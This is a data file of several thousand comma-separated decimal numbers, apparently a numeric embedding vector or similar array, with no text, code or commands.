0.006748663727194071, -0.02505865879356861, 0.00030811026226729155, -0.034629348665475845, 0.011483266949653625, 0.010718236677348614, -0.0008621232700534165, 0.0180484801530838, 0.002701026853173971, 0.022950921207666397, -0.0024570757523179054, 0.006303696893155575, -0.01926628313958645, -0.05027344822883606, 0.026838526129722595, -0.010343527421355247, 0.012911844998598099, 0.014855647459626198, 0.009992238134145737, 0.010554301552474499, 0.015347452834248543, 0.03956301882863045, 0.0027381074614822865, -0.001253908732905984, 0.00464482931420207, -0.013684682548046112, 0.014551196247339249, -0.04815009608864784, -0.005195183213800192, 0.023107049986720085, -0.029867423698306084, -0.00998443178832531, 0.02374717779457569, -0.00031835620757192373, -0.02135840803384781, -0.01273229718208313, 0.02128034457564354, -0.026479430496692657, -0.016783837229013443, -0.010054689832031727, 0.03181903436779976, 0.003395799547433853, -0.0033860416151583195, -0.01747080311179161, 0.04658880829811096, -0.03437954559922218, 0.009484820067882538, -0.030491938814520836, 0.024262402206659317, -0.029539553448557854, -0.029820585623383522, -0.04162391647696495, 0.011967265978455544, 0.001104610739275813, 0.006116342730820179, -0.026729237288236618, -0.026963429525494576, 0.019125768914818764, -0.018142158165574074, -0.004695571027696133, 0.0309603251516819, -0.012638620100915432, -0.0027712848968803883, 0.03781437501311302, 0.023138277232646942, 0.019578540697693825, -0.008227983489632607, -0.04252946376800537, 0.04084327444434166, 0.020031314343214035, -0.0024902531877160072, -0.009344303980469704, -0.00941456202417612, 0.022982148453593254, -0.03653411939740181, -0.023528598248958588, -0.021561376750469208, -0.007993790321052074, 0.013052361086010933, 0.03222496807575226, -0.010850946418941021, -0.008532434701919556, -0.0007533211028203368, 0.02074950747191906, -0.009672174230217934, 0.00319868721999228, 0.005772859323769808, 0.019328735768795013, -0.017049256712198257, -0.005804085172712803, -0.057424142956733704, 0.02223272994160652, -0.03634676709771156, 0.03834521397948265, 0.012092169374227524, -0.010101527906954288, 0.005519150290638208, -0.016830675303936005, 0.02279479242861271, 0.019250670447945595, -0.02493375726044178, -0.011498880572617054, 0.03925076127052307, 0.01013275422155857, 0.007701049093157053, -0.03522263839840889, -0.02074950747191906, -0.013130425475537777, 0.003382138442248106, -0.024590274319052696, 0.023981371894478798, -0.018313899636268616, -0.015199131332337856, -0.0200937669724226, -0.009250626899302006, -0.0026600430719554424, 0.03890727832913399, -0.0315692275762558, -0.005507440771907568, -0.01156133133918047, 0.008688563480973244, 0.002566365757957101, 0.0020452861208468676, -0.0014841986121609807, -0.011405202560126781, -0.01318507082760334, 0.001657891902141273, 0.00789230689406395, -0.025620723143219948, 0.013200683519244194, -0.009648755192756653, -0.0180484801530838, 0.007974274456501007, 0.001576900016516447, -0.020608991384506226, -0.012740103527903557, 0.010608946904540062, 0.03756456822156906, 0.019422411918640137, 0.005827504675835371, -0.0013036747695878148, -0.00035860814386978745, -0.0215301513671875, 0.0073692756704986095, 0.018844736739993095, 0.0023068017326295376, 0.008993014693260193, 0.01873544603586197, 0.019656606018543243, -0.023138277232646942, -0.028384201228618622, 0.012498104013502598, -0.024340467527508736, 0.03366135060787201, -0.018157770857214928, 0.024652725085616112, 0.0066432771272957325, 0.003493380034342408, 0.041030626744031906, -0.01792357675731182, 0.013458295725286007, 0.027041494846343994, 0.018423188477754593, 0.005780665669590235, 0.03981282189488411, 0.0011075381189584732, 0.008407531306147575, -0.02632330171763897, 0.025027433410286903, -0.0029274134431034327, 0.0075410171411931515, 0.025433368980884552, 0.014363842085003853, -0.006588631775230169, -0.024590274319052696, -0.007033598609268665, -0.020249895751476288, -0.010085915215313435, 0.005726020783185959, -0.051522478461265564, -0.005484021268785, 0.0032416225876659155, 0.022857245057821274, -0.014075004495680332, -0.008267016150057316, -0.039719145745038986, -0.023856468498706818, 0.0049726995639503, -0.01648719236254692, 0.06507445126771927, -0.02661994658410549, 0.004964893218129873, 0.0018013351364061236, -0.0034133640583604574, -0.003343106247484684, 0.00515615101903677, -0.00971901323646307, 0.016299838200211525, 0.007150695193558931, 0.04390339553356171, 0.006670599337667227, -0.023856468498706818, 0.04290417209267616, 0.04212353006005287, -0.015667516738176346, 0.011779911816120148, -0.017252223566174507, -0.031553614884614944, 0.019625380635261536, -0.004945377353578806, 0.030335810035467148, -0.005526956636458635, 0.01109294593334198, 0.00140418263617903, -0.006830631289631128, 0.05523834004998207, -0.01742396503686905, -0.010874365456402302, 0.02473078854382038, 0.00971901323646307, -0.02042163722217083, 0.007985983975231647, -0.010811913758516312, 0.001050941413268447, -0.0027849460020661354, 0.03375503048300743, -0.017033644020557404, -0.029055554419755936, 0.018719833344221115, 0.016549644991755486, 0.02362227626144886, 0.007974274456501007, -0.003663170151412487, -0.0013475860469043255, -0.005979729816317558, -0.013317779637873173, -0.004871216136962175, 0.004106185398995876, 0.01943802647292614, -0.02821245975792408, 0.0019057461759075522, 0.012053137645125389, -0.0053864410147070885, 0.0036456056404858828, 0.016924353316426277, -0.04093695059418678, 0.0013749084901064634, 0.011764299124479294, -0.024059435352683067, 0.04324765503406525, 0.0030328002758324146, 0.019594155251979828, -0.010000044479966164, 0.012677651830017567, -0.018875962123274803, 0.018516866490244865, 0.006038278341293335, -0.02246692217886448, -0.02243569679558277, 0.0360969603061676, 0.0062841810286045074, 0.02730691246688366, -0.010530882515013218, -0.016877515241503716, -0.019859572872519493, -0.022982148453593254, -0.0074941786006093025, 0.01686190254986286, 0.015441130846738815, -0.025527045130729675, -0.008251402527093887, 0.00633492274209857, 0.03247477486729622, 0.017642544582486153, -0.012599587440490723, 0.012950877659022808, 0.029414650052785873, -0.02004692703485489, 0.005722117610275745, -0.00031420905725099146, -0.014262358658015728, 0.013349005952477455, 0.0020394313614815474, -0.0016656982479617, -0.004430152475833893, -0.02206098847091198, 0.01000785082578659, 0.008766627870500088, 0.013856424018740654, 0.011936040595173836, -0.001318311900831759, 0.011194429360330105, -0.0018306092824786901, -0.004262314178049564, -0.014879067428410053, -0.011850169859826565, 0.015620678663253784, -0.006206116639077663, -0.028446651995182037, -0.01603441871702671, -0.0023712050169706345, 0.002283382462337613, 0.008118693716824055, -0.01195165328681469, 0.035128962248563766, 0.032943159341812134, 0.026744849979877472, 0.0049414741806685925, 0.004457475151866674, -0.004859506618231535, 0.0176269318908453, -0.01956292800605297, -0.0190633162856102, -0.012599587440490723, 0.005265441257506609, 0.008009403012692928, -0.003573396010324359, -0.0007464904338121414, -0.018032867461442947, -0.008212370797991753, 0.000993369030766189, -0.012131201103329659, -0.026401367038488388, 0.0017213191604241729, -0.012779136188328266, 0.013903262093663216, -0.007474662270396948, -0.014621454291045666, -0.0134270703420043, -0.013934488408267498, 0.013044554740190506, 0.006818921770900488, 0.010843140073120594, 0.015019582584500313, 0.002769333077594638, 0.04159269109368324, -0.02682291343808174, -0.000944090832490474, 0.019250670447945595, 0.0002776163746602833, 0.029227295890450478, -0.017486415803432465, -0.04827500134706497, -0.012529329396784306, 0.0053864410147070885, -0.03108522854745388, -0.0012314652558416128, -0.015043002553284168, -0.007548823487013578, 0.007334146648645401, -0.01051526889204979, -0.0190633162856102, -0.007607372011989355, -0.030601229518651962, -0.0030386552680283785, 0.03372380509972572, -0.012435652315616608, 0.011405202560126781, 0.015745582059025764, 0.0003083542105741799, -0.0012353685451671481, -0.017158545553684235, 0.0018471978837624192, 0.017970414832234383, -0.024434145539999008, 0.028961878269910812, -0.012271717190742493, -0.004133508075028658, 0.015285002067685127, -0.029367811977863312, -0.022872857749462128, -0.013302166946232319, -0.02148331142961979, 0.003226009663194418, 0.0385325662791729, 0.01754886843264103, 0.009851722046732903, 0.016221774742007256, -0.0015573840355500579, -0.018064092844724655, -0.02206098847091198, 0.019859572872519493, 0.00483999028801918, -0.001123150927014649, -0.012638620100915432, 0.029227295890450478, 0.018922800198197365, -0.009367723017930984, -0.015487968921661377, -0.005210795905441046, 0.01996886357665062, -0.02677607536315918, -0.03865747153759003, -0.0038524761330336332, -0.011803330853581429, 0.010858752764761448, 0.010921203531324863, -0.008017209358513355, 0.01437164843082428, 0.02148331142961979, -0.010882171802222729, -0.01593293622136116, 0.030788583680987358, 0.03478547930717468, 0.015402098186314106, 0.0007347807986661792, -0.00971901323646307, 0.015230356715619564, 0.00770885543897748, -0.01939118653535843, 0.022498149424791336, 0.019828347489237785, -0.02251376211643219, -0.01709609478712082, -0.021295957267284393, 0.0147619703784585, 0.0026873655151575804, 0.01775183528661728, 0.015245969407260418, -0.0032943158876150846, 0.006014858838170767, 0.01837635040283203, -0.00016295934619847685, -0.022872857749462128, -0.005003925412893295, -0.014754164032638073, -0.0058314078487455845, 0.005378634203225374, -0.03669025003910065, 0.0007196558290161192, 0.024964982643723488, -0.01164720207452774, -0.010054689832031727, -0.01299771573394537, -0.009773657657206059, -0.048649709671735764, -0.014980550855398178, 0.005343505647033453, -0.01299771573394537, -0.03837643936276436, -0.010109334252774715, 0.024434145539999008, -0.0076971459202468395, 0.002722494537010789, -0.03210006654262543, -0.014293584041297436, -0.022201504558324814, 0.004812667611986399, 0.015035196207463741, -0.028165621683001518, 0.026932204142212868, 0.0063934712670743465, 0.010608946904540062, 0.004457475151866674, -0.00045179747394286096, -0.011311525478959084, 0.00830604787915945, -0.005378634203225374, -0.028384201228618622, -0.008711982518434525, -0.002308753551915288, 0.004164733458310366, -0.03962546959519386, 0.005054667126387358, 0.023794017732143402, 0.013895455747842789, -0.0061202459037303925, 0.016331063583493233, -0.018969640135765076, 0.01714293286204338, -0.00896178837865591, 0.005070280283689499, 0.013950101099908352, -0.010039077140390873, -0.024059435352683067, 0.00601876201108098, 0.005378634203225374, -0.009336497634649277, -0.014637067914009094, -0.008173338137567043, -0.012295137159526348, -0.02004692703485489, -0.017049256712198257, 0.04843112826347351, 0.0289150383323431, -0.049305450171232224, 0.014379454776644707, 0.008805659599602222, 0.020234281197190285, -0.0340360626578331, 0.02226395532488823, 0.010281076654791832, 0.0014256503200158477, 0.022669890895485878, -0.014730744995176792, 0.00959410984069109, 0.01935996115207672, -0.016331063583493233, 0.017455190420150757, 0.006096826400607824, -0.0038758954033255577, -0.00417254026979208, -0.03768947347998619, 0.003473863936960697, -0.012708878144621849, -0.009422368369996548, -0.006124149076640606, -0.005327892489731312, -0.0012568362290039659, -0.013762746937572956, 0.020281121134757996, 0.004758022725582123, -0.004074959550052881, 0.010359140112996101, -0.00509369932115078, -0.009750238619744778, 0.011389589868485928, 0.016253000125288963, 0.007868887856602669, 0.01640912890434265, -0.011943846940994263, 0.013224102556705475, -0.001031425315886736, -0.04277927055954933, -0.01828267239034176, -0.012170233763754368, -0.0017525448929518461, -0.017658159136772156, 0.01269326452165842, 0.004301346372812986, 0.0065652127377688885, -0.0166120957583189, -0.022669890895485878, -0.01570654846727848, -0.015534807927906513, 0.022123439237475395, 0.015160098671913147, -0.014629260636866093, 0.044028300791978836, -0.015253775753080845, -0.00023028986470308155, -0.03822031244635582, 0.001410037511959672, 0.002099931240081787, -0.037908054888248444, -0.014348229393362999, -0.020733894780278206, 0.04015630856156349, -0.0077361781150102615, 0.030694905668497086, 0.015363066457211971, 0.020203055813908577, 0.004691667854785919, -0.032537225633859634, -0.03083542175590992, -0.01772060990333557, -0.025886142626404762, -0.012302943505346775, 0.008618305437266827, -0.02062460407614708, 0.02304459922015667, 0.028493491932749748, 0.0005679182359017432, -0.0013661263510584831, -0.00044740637531504035, -0.0194848645478487, -0.00516786053776741, -0.0016305693425238132, 0.004672151990234852, 0.0014978599501773715, 0.009640948846936226, 0.017205385491251945, -0.011436428874731064, 0.0069243088364601135, -0.004262314178049564, 0.0072131468914449215, -0.0198907982558012, -0.017829900607466698, 0.016721386462450027, -0.04296662285923958, -0.009375529363751411, -0.020062539726495743, 0.006916502490639687, -0.03153800219297409, 0.010929010808467865, 0.016627708449959755, 0.055050987750291824, 0.016096871346235275, -0.005499633960425854, 0.006498857866972685, -0.015105453319847584, -0.011459847912192345, 0.010148366913199425, 0.029086779803037643, 0.0053864410147070885, -0.023981371894478798, 0.00189110916107893, -0.008360693231225014, 0.03381748124957085, 0.008743207901716232, -0.006834534928202629, 0.022576212882995605, 0.0013719811104238033, -0.020780732855200768, 0.019141381606459618, -0.009422368369996548, 0.0022482536733150482, 0.007962564937770367, -0.011038300581276417, -0.023434920236468315, -0.021545764058828354, -0.017658159136772156, 0.01648719236254692, 0.0009597036987543106, 0.01853247918188572, -0.005722117610275745, 0.01981273479759693, -0.0030601229518651962, 0.011303719133138657, -0.011272493749856949, 0.00022089773847255856, -0.011256881058216095, 0.01203752402216196, -0.022529374808073044, -0.028477879241108894, 0.008118693716824055, -0.002634672215208411, -0.009102304466068745, 0.026791688054800034, -0.00047643654397688806, -0.03681515157222748, 0.001868665567599237, -0.014972744509577751, 0.011491074226796627, -0.013317779637873173, 0.008235789835453033, -0.008454370312392712, 0.011694041080772877, -0.031100841239094734, -0.008407531306147575, -0.014332616701722145, -0.02526162751019001, -0.014527777209877968, 0.09342742711305618, 0.008235789835453033, 0.01129591278731823, -0.00959410984069109, -0.010687011294066906, -0.014933711849153042, 0.02619839832186699, -0.0012841586722061038, 0.017611319199204445, -0.01590951718389988, 0.03597205877304077, -0.013349005952477455, 0.011803330853581429, -0.014379454776644707, 0.013645649887621403, 0.012310749851167202, -0.019000865519046783, -0.007861081510782242, -0.007958661764860153, 0.0080952737480402, -0.007662016898393631, -0.004355991259217262, 0.0166120957583189, 0.0006996518350206316, -0.011655009351670742, 0.0031147680711001158, -0.02854033000767231, -0.00843095127493143, 0.019453639164566994, -0.009781464003026485, 0.0081030810251832, -0.002734204288572073, 0.006533986888825893, -0.021233506500720978, 0.011701847426593304, 0.009992238134145737, 0.011904815211892128, -0.024980595335364342, 0.00163544830866158, -0.011046106927096844, 0.0005279102479107678, 0.02226395532488823, -0.00788059737533331, 0.04624532535672188, -0.01111636497080326, -0.030242133885622025, 0.006744760554283857, -0.020811958238482475, -0.022623050957918167, -0.015292808413505554, -0.0256363358348608, 0.0034699607640504837, -0.027213236317038536, 0.0030132844112813473, -0.021467698737978935, 0.008735401555895805, -0.016658933833241463, 0.021826794371008873, 0.009391142055392265, 0.020031314343214035, 0.0005986560718156397, -0.01648719236254692, -0.012412233278155327, -0.019422411918640137, 0.00015503093891311437, -0.0037080571055412292, -0.021046152338385582, -0.01131933182477951, -0.003571444423869252, 0.008821272291243076, 0.016580870375037193, -0.002989864908158779, 0.01131933182477951, 0.008766627870500088, 0.02190485969185829, 0.0011660864111036062, -0.010983655229210854, -0.009383335709571838, -0.002488301368430257, -0.02148331142961979, -0.013996940106153488, 0.010257656686007977, -0.03313051536679268, -0.015558226965367794, -0.0017593755619600415, 0.005565988831222057, -0.0068852766416966915, 0.002453172579407692, 0.04193617403507233, -0.011779911816120148, 0.008017209358513355, 0.007974274456501007, -0.02087440900504589, 0.00012417112884577364, -0.016346676275134087, -0.0053083766251802444, -0.018188996240496635, -0.014691712334752083, -0.005807988345623016, 0.003807589178904891, -0.0018081656889989972, 0.005936794448643923, 0.03494160622358322, 0.0022482536733150482, -0.020000088959932327, -0.017486415803432465, 0.012107782065868378, 0.028634008020162582, -0.021217893809080124, 0.009851722046732903, -0.017377126961946487, 0.0025605109985917807, 0.014840034767985344, -0.003963717725127935, 0.004422346130013466, -0.008110887371003628, 0.012685458175837994, 0.0268541406840086, 0.011225654743611813, 0.013364618644118309, -0.02619839832186699, -0.0025331885553896427, 0.024371692910790443, -0.011615976691246033, 0.02395014651119709, -0.013364618644118309, 0.0016793595859780908, -0.0007011155248619616, -0.002226785756647587, 0.007076534442603588, -0.010148366913199425, 0.020437249913811684, -0.008532434701919556, 0.00804062932729721, -0.013645649887621403, 0.0019564880058169365, -0.0028766717296093702, 0.007014082744717598, 0.0067603737115859985, -0.010445011779665947, -0.03950056433677673, 0.04805641993880272, 0.023200727999210358, -0.04087449982762337, -0.0009758045198395848, -0.009313078597187996, -0.03615941107273102, 0.00723656639456749, 0.004352088086307049, -0.0017203433671966195, -0.009055465459823608, -0.006373954936861992, -0.015527001582086086, 0.009406755678355694, -0.0021545763593167067, -0.012857199646532536, 0.012349781580269337, 0.007256082259118557, -0.002622962463647127, 0.00028761837165802717, 0.03600328415632248, -0.006104632746428251, 0.051522478461265564, -0.023107049986720085, -0.020000088959932327, -0.0147619703784585, -0.028524717316031456, -0.052833959460258484, -0.03256845101714134, -0.004125701263546944, 0.01976589672267437, -0.002984010148793459, -0.010523076169192791, 0.005109312478452921, 0.04162391647696495, 0.0027947041671723127, -0.002636623801663518, 0.006998470053076744, 0.024699563160538673, -0.0003571444540284574, -0.0017701094038784504, 0.025324078276753426, -0.03088226169347763, -0.005975826643407345, 0.018797898665070534, 0.021061765030026436, -0.0008704176289029419, 0.00555818248540163, -0.038407664746046066, -0.011631589382886887, -0.011186623014509678, 0.021514536812901497, -0.023138277232646942, -0.008883723989129066, -0.009968819096684456, -0.0012168282410129905, -0.007092147134244442, -0.0162061620503664, 0.007314630318433046, -0.00757614616304636, 0.017829900607466698, 0.0038232021033763885, -0.01168623473495245, -0.022295180708169937, -0.011803330853581429, -0.03931321203708649, 0.0030796390492469072, -0.03350522369146347, 0.0095316581428051, 0.006260761525481939, -0.00028542280779220164, -0.011764299124479294, 0.017455190420150757, -0.012193652801215649, 0.016268612816929817, -0.01170965377241373, -0.0012558604357764125, -0.040374886244535446, -0.022685503587126732, 0.00004467355029191822, 0.016502805054187775, 0.02879013679921627, -0.008540241047739983, 0.01545674353837967, 0.040905725210905075, -0.0036026702728122473, 0.0015037147095426917, -0.011085139587521553, 0.022123439237475395, 0.020281121134757996, 0.006982856895774603, -0.008883723989129066, 0.013887649402022362, -0.01853247918188572, 0.007033598609268665, 0.0066432771272957325, 0.002991816494613886, 0.004953183699399233, 0.014925905503332615, -0.01648719236254692, 0.03503528609871864, 0.0003176243626512587, -0.00815772544592619, -0.00863391812890768, -0.003651460399851203, -0.000050345413910690695, 0.014746357686817646, 0.004886828828603029, -0.014512164518237114, 0.00804062932729721, -0.004176443442702293, -0.004071056377142668, 0.003996895160526037, -0.011764299124479294, 0.01631545089185238, 0.0016091016586869955, -0.0063154068775475025, -0.008259208872914314, -0.011264687404036522, -0.03597205877304077, 0.02185802161693573, -0.027400590479373932, 0.013747134245932102, 0.014090617187321186, -0.010999267920851707, 0.016096871346235275, -0.012006298638880253, -0.0017203433671966195, 0.0010441108606755733, 0.0026405269745737314, 0.01976589672267437, 0.011405202560126781, 0.024434145539999008, -0.0028727685566991568, -0.022201504558324814, 0.005702601280063391, -0.006338825915008783, -0.017127320170402527, 0.0032611386850476265, -0.005214699078351259, 0.004625313449651003, 0.022982148453593254, -0.003382138442248106, -0.024387305602431297, 0.04736945405602455, -0.021842407062649727, -0.007950855419039726, -0.010117140598595142, -0.0034777673427015543, 0.005281053949147463, -0.033848706632852554, -0.00515615101903677, 0.007740081287920475, 0.015495775267481804, -0.02727568708360195, 0.022404471412301064, -0.011639395728707314, 0.007170211523771286, -0.015097646974027157, -0.00018613471183925867, -0.0036007186863571405, -0.019734669476747513, 0.008188951760530472, 0.03381748124957085, -0.015620678663253784, -0.001749617513269186, 0.0026717528235167265, 0.0011446187272667885, -0.002466833684593439, 0.014285777695477009, -0.012287329882383347, -0.021139828488230705, -0.015800226479768753, -0.005199086386710405, -0.007181921042501926, -0.0007830830872990191, 0.03234986960887909, 0.001674480503425002, 0.009235014207661152, -0.002866913564503193, -0.0027381074614822865, -0.017814286053180695, -0.028368588536977768, 0.023731565102934837, 0.0031147680711001158, -0.013458295725286007, -0.011498880572617054, -0.01689312793314457, -0.009102304466068745, -0.0013622230617329478, -0.016393516212701797, 0.009422368369996548, -0.010921203531324863, 0.018064092844724655, -0.013138231821358204, -0.03478547930717468, -0.014293584041297436, -0.00830604787915945, -0.011803330853581429, 0.004558958578854799, 0.0026912689208984375, 0.026026656851172447, 0.0027751880697906017, 0.016455966979265213, 0.0008518773247487843, -0.00763859786093235, 0.017455190420150757, -0.002380962949246168, -0.010718236677348614, 0.006705728359520435, -0.0064793420024216175, 0.0037841699086129665, 0.02145208604633808, 0.017455190420150757, 0.04162391647696495, 0.024918144568800926, 0.021389635279774666, 0.03675270080566406, -0.007646404206752777, -0.004106185398995876, -0.04580816626548767, 0.008196758106350899, -0.0062373424880206585, 0.0016647224547341466, -0.0007840589387342334, 0.008110887371003628, -0.0053474088199436665, 0.005647956393659115, 0.032662127166986465, -0.00824359618127346, -0.011897008866071701, -0.026151560246944427, -0.02448098361492157, -0.008751015178859234, 0.012185846455395222, -0.0011563283624127507, 0.005608924198895693, -0.015308421105146408, 0.008204564452171326, 0.006319310050457716, -0.031100841239094734, -0.011553524993360043, -0.010538688860833645, -0.007228759583085775, -0.008009403012692928, 0.017236610874533653, -0.0014217471471056342, 0.002066754037514329, 0.013622230850160122, -0.02288847044110298, -0.017127320170402527, -0.003827105276286602, -0.03178780898451805, 0.017314674332737923, -0.01437164843082428, 0.0010128851281479, 0.022747954353690147, -0.012021911330521107, -0.018391963094472885, -0.00946920644491911, 0.005491827614605427, -0.00889933668076992, 0.0062373424880206585, 0.010655784979462624, 0.0015427469043061137, 0.0027634783182293177, 0.00881346594542265, -0.026260850951075554, 0.041686367243528366, -0.032131291925907135, 0.006510567851364613, 0.018766671419143677, -0.025105498731136322, -0.028649620711803436, -0.0033450578339397907, 0.00014075980288907886, 0.011350558139383793, 0.02518356218934059, -0.027947040274739265, 0.012068750336766243, -0.01812654361128807, -0.012006298638880253, -0.026432592421770096, -0.026635559275746346, 0.022014150395989418, -0.014769776724278927, 0.003696347353979945, 0.0003154287987854332, -0.024637112393975258, 0.03338032215833664, -0.0007128251600079238, -0.011834557168185711, 0.016331063583493233, 0.013591005466878414, 0.011670622043311596, 0.012295137159526348, 0.014387261122465134, -0.013458295725286007, 0.028056330978870392, 0.005132731515914202, -0.009961012750864029, 0.0018501253798604012, -0.007935241796076298, 0.020687054842710495, -0.010452818125486374, -0.038438890129327774, 0.008844692260026932, 0.018626157194375992, -0.021764343604445457, -0.01923505775630474, 0.016877515241503716, 0.008126500062644482, 0.0038973630871623755, 0.021233506500720978, 0.004277926869690418, 0.014207713305950165, 0.02185802161693573, 0.013957907445728779, 0.0026854139287024736, 0.013216296210885048, -0.005062473937869072, -0.0064090839587152, -0.005359118338674307, -0.01800164207816124, 0.014980550855398178, 0.01318507082760334, 0.007146792020648718, 0.0003144530055578798, -0.013918875716626644, 0.010343527421355247, -0.0018491495866328478, -0.005081989802420139, -0.0038680890575051308, -0.02198292315006256, 0.009211594238877296, -0.0008611474768258631, 0.016799449920654297, -0.0012831828789785504, 0.0036943957675248384, 0.013239715248346329, -0.0012919651344418526, 0.004414539784193039, -0.003159655025228858, -0.010647978633642197, 0.00248049502260983, 0.031803421676158905, -0.007099953480064869, 0.004488700535148382, 0.01636228896677494, 0.0147619703784585, 0.007740081287920475, 0.006978953722864389, -0.01375494059175253, 0.016331063583493233, -0.0017720609903335571, 0.006834534928202629, 0.023263178765773773, 0.010936817154288292, 0.008985207416117191, 0.013434876687824726, -0.02160821482539177, 0.001949657336808741, 0.013200683519244194, -0.01611248403787613, 0.0006859905552119017, 0.004851699806749821, -0.012763522565364838, 0.021264731884002686, 0.00045765232061967254, -0.007275598123669624, -0.0037919762544333935, -0.0072912112809717655, -0.014535583555698395, 0.02402820996940136, 0.006338825915008783, -0.0031440421007573605, -0.012662039138376713, -0.002507817465811968, 0.00009489699004916474, -0.013973520137369633, 0.00830604787915945, 0.005640150047838688, 0.004683861508965492, -0.024824466556310654, -0.006510567851364613, 0.008134306408464909, 0.025199174880981445, -0.02074950747191906, -0.005355215165764093, -0.024324854835867882, -0.006459825672209263, 0.0053864410147070885, -0.01064017228782177, -0.03369257599115372, -0.0020901733078062534, -0.013169457204639912, -0.015378679148852825, -0.0034894768614321947, 0.010944623500108719, 0.030445100739598274, -0.0034328801557421684, -0.023559823632240295, -0.0021428666077554226, 0.019453639164566994, -0.008384112268686295, 0.006389568094164133, 0.01935996115207672, -0.024590274319052696, -0.013317779637873173, 0.0010050786659121513, -0.003996895160526037, -0.016658933833241463, -0.00043569671106524765, 0.00967998057603836, -0.021389635279774666, -0.013200683519244194, 0.006686212494969368, -0.009016433730721474, -0.03925076127052307, -0.010538688860833645, -0.000557672290597111, -0.0023575436789542437, 0.01443410012871027, 0.00836849957704544, -0.003073784289881587, 0.01775183528661728, 0.0062685683369636536, 0.012576168403029442, 0.004289636388421059, -0.015394291840493679, 0.026260850951075554, 0.02682291343808174, 0.0064012776128947735, 0.01850125379860401, 0.0156831294298172, 0.010960236191749573, 0.0038700406439602375, -0.005710408091545105, 0.0006986760417930782, 0.012084363028407097, 0.011592557653784752, -0.007068727631121874, -0.02140524797141552, -0.005121021997183561, -0.017330287024378777, -0.007556629832834005, 0.005214699078351259, 0.019953250885009766, -0.03300561010837555, -0.007076534442603588, 0.007888403721153736, 0.022576212882995605, -0.0067213415168225765, -0.013747134245932102, -0.01135836448520422, -0.002950832713395357, -0.028852587565779686, -0.0028513006400316954, 0.012334168888628483, 0.020890023559331894, 0.004578474909067154, 0.002859107218682766, -0.01181113813072443, -0.0038114923518151045, -0.003145993687212467, -0.013270941562950611, 0.026729237288236618, -0.004219378810375929, -0.02173311822116375, -0.015964161604642868, 0.010382560081779957, -0.011795524507761002, -0.00723656639456749, -0.03466057404875755, 0.03662779927253723, -0.011459847912192345, 0.004340378567576408, -0.005788472481071949, 0.0007313654641620815, -0.01201410498470068, -0.0014451664173975587, 0.004410636145621538, -0.014660486951470375, -0.01882912404835224, 0.027135170996189117, 0.012326362542808056, 0.003507041372358799, -0.005000022239983082, 0.011108558624982834, -0.014285777695477009, 0.020359184592962265, -0.0072599854320287704, -0.0013270941562950611, 0.0058782463893294334, -0.008579272776842117, 0.013403650373220444, -0.006010955665260553, -0.0252147875726223, -0.006128052249550819, 0.0013339247088879347, 0.004313055891543627, -0.007353662513196468, -0.01775183528661728, -0.007946952246129513, -0.0213271826505661, -0.011537912301719189, -0.023731565102934837, -0.004199862480163574, -0.00554647296667099, 0.020390409976243973, 0.005585505161434412, 0.023466147482395172, 0.013044554740190506, 0.013731520622968674, -0.004918054677546024, -0.017174160107970238, -0.018220221623778343, -0.023637888953089714, -0.014075004495680332, -0.020780732855200768, -0.0008030870812945068, 0.011327139101922512, 0.022529374808073044, 0.021092990413308144, 0.03141309693455696, 0.00920378789305687, 0.026713624596595764, 0.023341244086623192, -0.0008630990632809699, -0.009570690803229809, -0.0015778759261593223, -0.0022423986811190844, -0.016346676275134087, 0.005749440286308527, 0.000503515126183629, -0.009383335709571838, 0.00908669177442789, -0.009906367398798466, -0.0010216672671958804, -0.0016637466615065932, 0.00017918209778144956, 0.012646426446735859, -0.0022736245300620794, -0.007872791029512882, 0.0019486815435811877, -0.01739273965358734, 0.015550420619547367, -0.015261582098901272, 0.0184544138610363, 0.02029673382639885, -0.012420039623975754, 0.010983655229210854, -0.030663680285215378, -0.0077830166555941105, 0.014879067428410053, -0.01873544603586197, 0.007482469081878662, 0.00137393269687891, -0.0005796278710477054, 0.0025800270959734917, 0.015167905017733574, -0.0003681222442537546, -0.008829079568386078, 0.00848559569567442, 0.004543345887213945, 0.013676876202225685, 0.002488301368430257, -0.01951608993113041, 0.006178793963044882, 0.017533255741000175, -0.0033411546610295773, 0.025698786601424217, 0.015597258694469929, 0.019250670447945595, -0.02059337869286537, -0.0034426383208483458, -0.013099199160933495, -0.009281852282583714, 0.020437249913811684, 0.015472356230020523, 0.018345125019550323, 0.002683462342247367, 0.00023248542856890708, 0.022029763087630272, -0.024293629452586174, -0.015534807927906513, -0.016253000125288963, -0.024012597277760506, 0.004664345644414425, 0.02107737772166729, 0.017533255741000175, 0.019781509414315224, 0.013645649887621403, -0.009961012750864029, -0.00002073584619211033, -0.00016844825586304069, 0.016050033271312714, -0.0002522454597055912, -0.011553524993360043, 0.027384977787733078, 0.004168636631220579, -0.012685458175837994, -0.011615976691246033, 0.02304459922015667, -0.0027849460020661354, 0.01551919523626566, -0.0006069503724575043, 0.00004677762990468182, -0.01828267239034176, 0.007845467887818813, 0.003538267221301794, 0.0037197668571025133, 0.006959437858313322, 0.011225654743611813, -0.019250670447945595, 0.004691667854785919, -0.004012508317828178, 0.012716684490442276, -0.008953982032835484, -0.013395844027400017, 0.010210818611085415, 0.006096826400607824, -0.022342020645737648, 0.010179592296481133, 0.014918099157512188, -0.01123346108943224, 0.0030991551466286182, -0.017283448949456215, 0.0062841810286045074, 0.0007352686952799559, -0.002324366243556142, -0.01423113327473402, 0.02246692217886448, 0.010569914244115353, -0.009422368369996548, 0.005952407605946064, 0.0017320530023425817, -0.009875141084194183, 0.005269344430416822, 0.009039852768182755, 0.01669016107916832, -0.007814242504537106, -0.002131157089024782, -0.006471535656601191, -0.001946729957126081, -0.0009192078141495585, -0.02783775143325329, 0.003284557955339551, 0.0009031070512719452, -0.0037392829544842243, -0.0030249939300119877, 0.00372171844355762, -0.007911822758615017, -0.0033411546610295773, 0.0036202347837388515, -0.00795475859194994, -0.011920427903532982, -0.0026717528235167265, 0.03662779927253723, -0.0033528641797602177, -0.021217893809080124, -0.021498924121260643, -0.005971923470497131, -0.003579251002520323, 0.004160830285400152, 0.014941518194973469, 0.0028961878269910812, 0.0029293650295585394, -0.002072608796879649, -0.02629207633435726, 0.030398262664675713, 0.006619857624173164, -0.03400483354926109, -0.007158502005040646, -0.04174881801009178, 0.0032416225876659155, -0.007256082259118557, -0.016424741595983505, 0.014480939134955406, 0.01168623473495245, 0.02649504318833351, -0.0006303697009570897, 0.010983655229210854, 0.012154621072113514, -0.004055443685501814, 0.009555078111588955, -0.032662127166986465, -0.005429376382380724, 0.0006254906766116619, 0.012154621072113514, -0.009313078597187996, -0.012224879115819931, -0.010343527421355247, 